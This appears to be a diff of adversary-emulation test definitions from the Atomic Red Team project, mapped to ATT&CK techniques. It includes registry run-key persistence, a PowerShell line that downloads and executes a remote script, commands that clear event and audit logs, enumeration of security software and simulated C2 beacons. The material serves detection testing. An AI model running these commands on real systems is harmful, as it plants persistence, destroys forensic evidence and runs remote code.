-Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.
+The following run keys are created by default on Windows systems:
+* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code>
+* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>
+* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</code>
+* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>

-Detection: Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.
+The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: <code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)

-Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
+The following Registry keys can be used to set startup folder items for persistence:
+* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>
+* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>
+* <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>
+* <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>

-Platforms: Windows
-
-Data Sources: Windows Registry, File monitoring
-
-Permissions Required: User, Administrator</blockquote>
+Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.</blockquote>

 ## Atomic Tests

@@ -41,6 +45,7 @@ Run Key Persistence
 #### Run it with `command_prompt`!
 ```
 REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
+REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
 ```
 <br/>
 <br/>
@@ -59,6 +64,7 @@ RunOnce Key Persistence
 #### Run it with `command_prompt`!
 ```
 REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
+REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f
 ```
 <br/>
 <br/>
@@ -77,7 +83,8 @@ RunOnce Key Persistence via PowerShell
 #### Run it with `powershell`!
 ```
 $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
-set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"'
+set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
+Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
 ```
 <br/>
 <br/>
@@ -20,6 +20,7 @@ atomic_tests:
    name: command_prompt
    command: |
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
+        REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
 - name: Reg Key RunOnce
  description: |
    RunOnce Key Persistence
@@ -37,6 +38,7 @@ atomic_tests:
    name: command_prompt
    command: |
        REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
+        REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f
 - name: PowerShell Registry RunOnce
  description: |
    RunOnce Key Persistence via PowerShell
@@ -54,7 +56,8 @@ atomic_tests:
    name: powershell
    command: |
        $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
-        set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"'
+        set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
+        Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
 - name: Startup Folder
  description: |
    Add Shortcut To Startup via PowerShell
@@ -1,14 +1,6 @@
 # T1062 - Hypervisor
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1062)
-<blockquote>A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. (Citation: Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could be designed with Rootkit functionality to hide its existence from the guest operating system. (Citation: Myers 2007) A malicious hypervisor of this nature could be used to persist on systems through interruption.
-
-Detection: Type-1 hypervisors may be detected by performing timing analysis. Hypervisors emulate certain CPU instructions that would normally be executed by the hardware. If an instruction takes orders of magnitude longer to execute than normal on a system that should not contain a hypervisor, one may be present. (Citation: virtualization.info 2006)
-
-Platforms: Windows
-
-Data Sources: System calls
-
-Permissions Required: Administrator, SYSTEM</blockquote>
+<blockquote>A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. (Citation: Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could be designed with [Rootkit](https://attack.mitre.org/techniques/T1014) functionality to hide its existence from the guest operating system. (Citation: Myers 2007) A malicious hypervisor of this nature could be used to persist on systems through interruption.</blockquote>

 ## Atomic Tests

@@ -1,24 +1,14 @@
 # T1063 - Security Software Discovery
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1063)
-<blockquote>Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules, anti-virus, and virtualization. These checks may be built into early-stage remote access tools.
+<blockquote>Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. These checks may be built into early-stage remote access tools.

-===Windows===
+### Windows

-Example commands that can be used to obtain security software information are netsh, <code>reg query</code> with Reg, <code>dir</code> with cmd, and Tasklist, but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for.
+Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), <code>reg query</code> with [Reg](https://attack.mitre.org/software/S0075), <code>dir</code> with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for.

-===Mac===
+### Mac

-It's becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.
-
-Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.
-
-Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
-
-Platforms: macOS, Windows
-
-Data Sources: File monitoring, Process command-line parameters, Process monitoring
-
-Permissions Required: User, Administrator, SYSTEM</blockquote>
+It's becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.</blockquote>

 ## Atomic Tests

@@ -28,6 +18,8 @@ Permissions Required: User, Administrator, SYSTEM</blockquote>

 - [Atomic Test #3 - Security Software Discovery - ps](#atomic-test-3---security-software-discovery---ps)

+- [Atomic Test #4 - Security Software Discovery - Sysmon Service](#atomic-test-4---security-software-discovery---sysmon-service)
+

 <br/>

@@ -57,10 +49,10 @@ Methods to identify Security Software on an endpoint

 #### Run it with `powershell`!
 ```
-powershell.exe get-process | ?{$_.Description -like "*virus*"}
-powershell.exe get-process | ?{$_.Description -like "*carbonblack*"}
-powershell.exe get-process | ?{$_.Description -like "*defender*"}
-powershell.exe get-process | ?{$_.Description -like "*cylance*"}
+get-process | ?{$_.Description -like "*virus*"}
+get-process | ?{$_.Description -like "*carbonblack*"}
+get-process | ?{$_.Description -like "*defender*"}
+get-process | ?{$_.Description -like "*cylance*"}
 ```
 <br/>
 <br/>
@@ -77,3 +69,16 @@ ps -ef | grep Little\ Snitch | grep -v grep
 ps aux | grep CbOsxSensorService
 ```
 <br/>
+<br/>
+
+## Atomic Test #4 - Security Software Discovery - Sysmon Service
+Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `command_prompt`!
+```
+fltmc.exe | findstr.exe 385201
+```
+<br/>
@@ -30,10 +30,10 @@ atomic_tests:
  executor:
    name: powershell
    command: |
-      powershell.exe get-process | ?{$_.Description -like "*virus*"}
-      powershell.exe get-process | ?{$_.Description -like "*carbonblack*"}
-      powershell.exe get-process | ?{$_.Description -like "*defender*"}
-      powershell.exe get-process | ?{$_.Description -like "*cylance*"}
+      get-process | ?{$_.Description -like "*virus*"}
+      get-process | ?{$_.Description -like "*carbonblack*"}
+      get-process | ?{$_.Description -like "*defender*"}
+      get-process | ?{$_.Description -like "*cylance*"}

 - name: Security Software Discovery - ps
  description: |
@@ -48,3 +48,15 @@ atomic_tests:
    command: |
      ps -ef | grep Little\ Snitch | grep -v grep
      ps aux | grep CbOsxSensorService
+
+- name: Security Software Discovery - Sysmon Service
+  description: |
+    Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).
+
+  supported_platforms:
+    - windows
+
+  executor:
+    name: command_prompt
+    command: |
+      fltmc.exe | findstr.exe 385201
@@ -0,0 +1,29 @@
+# T1064 - Scripting
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1064)
+<blockquote>Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.
+
+Scripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.
+
+Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. (Citation: Metasploit) (Citation: Metasploit),  (Citation: Veil) (Citation: Veil), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Create and Execute Bash Shell Script](#atomic-test-1---create-and-execute-bash-shell-script)
+
+
+<br/>
+
+## Atomic Test #1 - Create and Execute Bash Shell Script
+Creates and executes a simple bash script.
+
+**Supported Platforms:** macOS, Linux
+
+
+#### Run it with `sh`!
+```
+sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
+sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh"
+chmod +x /tmp/art.sh
+sh /tmp/art.sh
+```
+<br/>
@@ -0,0 +1,20 @@
+---
+attack_technique: T1064
+display_name: Scripting
+
+atomic_tests:
+- name: Create and Execute Bash Shell Script
+  description: |
+    Creates and executes a simple bash script.
+
+  supported_platforms:
+    - macos
+    - linux
+
+  executor:
+    name: sh
+    command: |
+      sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
+      sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh"
+      chmod +x /tmp/art.sh
+      sh /tmp/art.sh
@@ -1,14 +1,6 @@
 # T1065 - Uncommonly Used Port
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1065)
-<blockquote>Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.
-
-Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
-
-Platforms: Linux, macOS, Windows
-
-Data Sources: Netflow/Enclave netflow, Process use of network, Process monitoring
-
-Requires Network: Yes</blockquote>
+<blockquote>Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.</blockquote>

 ## Atomic Tests

@@ -29,11 +21,11 @@ Testing uncommonly used port utilizing PowerShell
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
 | port | Specify uncommon port number | String | 8081|
-| hostname | Specify target hostname | String | google.com|
+| domain | Specify target hostname | String | google.com|

 #### Run it with `powershell`!
 ```
-test-netconnection -ComputerName #{hostname} -port #{port}
+test-netconnection -ComputerName #{domain} -port #{port}
 ```
 <br/>
 <br/>
@@ -48,10 +40,10 @@ Testing uncommonly used port utilizing telnet.
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
 | port | Specify uncommon port number | String | 8081|
-| hostname | Specify target hostname | String | google.com|
+| domain | Specify target hostname | String | google.com|

 #### Run it with `sh`!
 ```
-telnet #{hostname} #{port}
+telnet #{domain} #{port}
 ```
 <br/>
@@ -14,8 +14,8 @@ atomic_tests:
    port:
      description: Specify uncommon port number
      type: String
-      default: 8081
-    hostname:
+      default: "8081"
+    domain:
      description: Specify target hostname
      type: String
      default: google.com
@@ -23,7 +23,7 @@ atomic_tests:
  executor:
    name: powershell
    command: |
-      test-netconnection -ComputerName #{hostname} -port #{port}
+      test-netconnection -ComputerName #{domain} -port #{port}

 - name: Testing usage of uncommonly used port
  description: |
@@ -37,8 +37,8 @@ atomic_tests:
    port:
      description: Specify uncommon port number
      type: String
-      default: 8081
-    hostname:
+      default: "8081"
+    domain:
      description: Specify target hostname
      type: String
      default: google.com
@@ -46,5 +46,4 @@ atomic_tests:
  executor:
    name: sh
    command: |
-      telnet #{hostname} #{port}
-
+      telnet #{domain} #{port}
@@ -2,32 +2,26 @@
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1069)
 <blockquote>Adversaries may attempt to find local system or domain-level groups and permissions settings. 

-===Windows===
+### Windows

-Examples of commands that can list groups are <code>net group /domain</code> and <code>net localgroup</code> using the Net utility.
+Examples of commands that can list groups are <code>net group /domain</code> and <code>net localgroup</code> using the [Net](https://attack.mitre.org/software/S0039) utility.

-===Mac===
+### Mac

 On Mac, this same thing can be accomplished with the <code>dscacheutil -q group</code> for the domain, or <code>dscl . -list /Groups</code> for local groups.

-===Linux===
+### Linux

-On Linux, local groups can be enumerated with the <code>groups</code> command and domain groups via the <code>ldapsearch</code> command.
-
-Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
-Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
-
-Platforms: Linux, Windows, macOS
-
-Data Sources: API monitoring, Process command-line parameters, Process monitoring
-
-Permissions Required: User</blockquote>
+On Linux, local groups can be enumerated with the <code>groups</code> command and domain groups via the <code>ldapsearch</code> command.</blockquote>

 ## Atomic Tests

 - [Atomic Test #1 - Permission Groups Discovery](#atomic-test-1---permission-groups-discovery)

+- [Atomic Test #2 - Permission Groups Discovery Windows](#atomic-test-2---permission-groups-discovery-windows)
+
+- [Atomic Test #3 - Permission Groups Discovery PowerShell](#atomic-test-3---permission-groups-discovery-powershell)
+

 <br/>

@@ -44,3 +38,36 @@ dscl . -list /Groups
 groups
 ```
 <br/>
+<br/>
+
+## Atomic Test #2 - Permission Groups Discovery Windows
+Permission Groups Discovery for Windows
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `command_prompt`!
+```
+net localgroup
+net group /domain
+```
+<br/>
+<br/>
+
+## Atomic Test #3 - Permission Groups Discovery PowerShell
+Permission Groups Discovery utilizing PowerShell
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| user | User to identify what groups a user is a member of | string | administrator|
+
+#### Run it with `powershell`!
+```
+get-localgroup
+get-ADPrinicipalGroupMembership #{user} | select name
+```
+<br/>
@@ -17,3 +17,37 @@ atomic_tests:
      dscacheutil -q group
      dscl . -list /Groups
      groups
+
+- name: Permission Groups Discovery Windows
+  description: |
+    Permission Groups Discovery for Windows
+
+  supported_platforms:
+    - windows
+
+  executor:
+    name: command_prompt
+    command: |
+      net localgroup
+      net group /domain
+
+- name: Permission Groups Discovery PowerShell
+  description: |
+    Permission Groups Discovery utilizing PowerShell
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    user:
+      description: User to identify what groups a user is a member of
+      type: string
+      default: administrator
+
+  executor:
+    name: powershell
+    command: |
+      get-localgroup
+      get-ADPrinicipalGroupMembership #{user} | select name
+
+
@@ -1,14 +1,22 @@
 # T1070 - Indicator Removal on Host
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070)
-<blockquote>Adversaries may delete or alter generated event files on a host system, including potentially captured files such as quarantined malware. This may compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine what occurred.
+<blockquote>Adversaries may delete or alter generated artifacts on a host system, including logs and potentially captured files such as quarantined malware. Locations and format of logs will vary, but typical organic system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1139) and /var/log/* .

-Detection: File system monitoring may be used to detect improper deletion or modification of indicator files. Events not stored on the file system will require different detection mechanisms.
+Actions that interfere with eventing and other notifications that can be used to detect intrusion activity may compromise the integrity of security solutions, causing events to go unreported. They may also make forensic analysis and incident response more difficult due to lack of sufficient data to determine what occurred.

-Platforms: Linux, macOS, Windows
+### Clear Windows Event Logs

-Data Sources: File monitoring, Process command-line parameters, Process monitoring
+Windows event logs are a record of a computer's alerts and notifications. Microsoft defines an event as "any significant occurrence in the system or in a program that requires users to be notified or an entry added to a log." There are three system-defined sources of Events: System, Application, and Security.
+ 
+Adversaries performing actions related to account management, account logon and directory service access, etc. may choose to clear the events in order to hide their activities.

-Defense Bypassed: Anti-virus, Log analysis, Host intrusion prevention systems</blockquote>
+The event logs can be cleared with the following utility commands:
+
+* <code>wevtutil cl system</code>
+* <code>wevtutil cl application</code>
+* <code>wevtutil cl security</code>
+
+Logs may also be cleared through other mechanisms, such as [PowerShell](https://attack.mitre.org/techniques/T1086).</blockquote>

 ## Atomic Tests

@@ -18,6 +26,10 @@ Defense Bypassed: Anti-virus, Log analysis, Host intrusion prevention systems</b

 - [Atomic Test #3 - rm -rf](#atomic-test-3---rm--rf)

+- [Atomic Test #4 - Overwrite Linux Mail Spool](#atomic-test-4---overwrite-linux-mail-spool)
+
+- [Atomic Test #5 - Overwrite Linux Log](#atomic-test-5---overwrite-linux-log)
+

 <br/>

@@ -64,3 +76,39 @@ rm -rf /private/var/log/system.log*
 rm -rf /private/var/audit/*
 ```
 <br/>
+<br/>
+
+## Atomic Test #4 - Overwrite Linux Mail Spool
+This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
+
+**Supported Platforms:** Linux
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| username | Username of mail spool | String | root|
+
+#### Run it with `bash`!
+```
+echo 0> /var/spool/mail/#{username}
+```
+<br/>
+<br/>
+
+## Atomic Test #5 - Overwrite Linux Log
+This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
+
+**Supported Platforms:** Linux
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| log_path | Path of specified log | Path | /var/log/secure|
+
+#### Run it with `bash`!
+```
+echo 0> #{log_path}
+```
+<br/>
@@ -17,6 +17,7 @@ atomic_tests:
    name: command_prompt
    command: |
      wevtutil cl #{log_name}
+
 - name: FSUtil
  description: |
    Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume.
@@ -26,6 +27,7 @@ atomic_tests:
    name: command_prompt
    command: |
      fsutil usn deletejournal /D C:
+
 - name: rm -rf
  description: |
    Delete system and audit logs
@@ -37,3 +39,33 @@ atomic_tests:
    command: |
      rm -rf /private/var/log/system.log*
      rm -rf /private/var/audit/*
+
+- name: Overwrite Linux Mail Spool
+  description: |
+    This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
+  supported_platforms:
+    - linux
+  input_arguments:
+    username:
+      description: Username of mail spool
+      type: String
+      default: root
+  executor:
+    name: bash
+    command: |
+      echo 0> /var/spool/mail/#{username}
+
+- name: Overwrite Linux Log
+  description: |
+    This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
+  supported_platforms:
+    - linux
+  input_arguments:
+    log_path:
+      description: Path of specified log
+      type: Path
+      default: /var/log/secure
+  executor:
+    name: bash
+    command: |
+      echo 0> #{log_path}
@@ -0,0 +1,57 @@
+# T1071 - Standard Application Layer Protocol
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1071)
+<blockquote>Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
+
+For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Malicious User Agents](#atomic-test-1---malicious-user-agents)
+
+- [Atomic Test #2 - Malicious User Agents - Nix](#atomic-test-2---malicious-user-agents---nix)
+
+
+<br/>
+
+## Atomic Test #1 - Malicious User Agents
+This test simulates an infected host beaconing to command and control.
+Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| domain | Default domain to simulate against | string | www.google.com|
+
+#### Run it with `powershell`!
+```
+Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null
+Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
+Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
+Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
+```
+<br/>
+<br/>
+
+## Atomic Test #2 - Malicious User Agents - Nix
+This test simulates an infected host beaconing to command and control.
+Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
+
+**Supported Platforms:** Linux, macOS
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| domain | Default domain to simulate against | string | www.google.com|
+
+#### Run it with `sh`!
+```
+curl -s -A "HttpBrowser/1.0" -m3 #{domain}
+curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
+curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
+curl -s -A "*<|>*" -m3 #{domain}
+```
+<br/>
@@ -0,0 +1,45 @@
+---
+attack_technique: T1071
+display_name: Standard Application Layer Protocol
+
+atomic_tests:
+- name: Malicious User Agents
+  description: |
+    This test simulates an infected host beaconing to command and control.
+    Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
+
+  supported_platforms:
+    - windows
+  input_arguments:
+    domain:
+      description: Default domain to simulate against
+      type: string
+      default: www.google.com
+  executor:
+    name: powershell
+    command: |
+      Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null
+      Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
+      Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
+      Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
+
+- name: Malicious User Agents - Nix
+  description: |
+    This test simulates an infected host beaconing to command and control.
+    Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
+
+  supported_platforms:
+    - linux
+    - macos
+  input_arguments:
+    domain:
+      description: Default domain to simulate against
+      type: string
+      default: www.google.com
+  executor:
+    name: sh
+    command: |
+      curl -s -A "HttpBrowser/1.0" -m3 #{domain}
+      curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
+      curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
+      curl -s -A "*<|>*" -m3 #{domain}
@@ -0,0 +1,15 @@
+#!/bin/
+
+curl ifconfig.me
+ifconfig
+whoami
+pwd
+ls -lhart /Users/
+ls /Applications/
+ls /Library/
+crontab -l
+at -l
+netstat -an | grep -i listen
+netstat -an | grep -i established
+arp -a
+ps aux
--- a/Show More
+++ b/Show More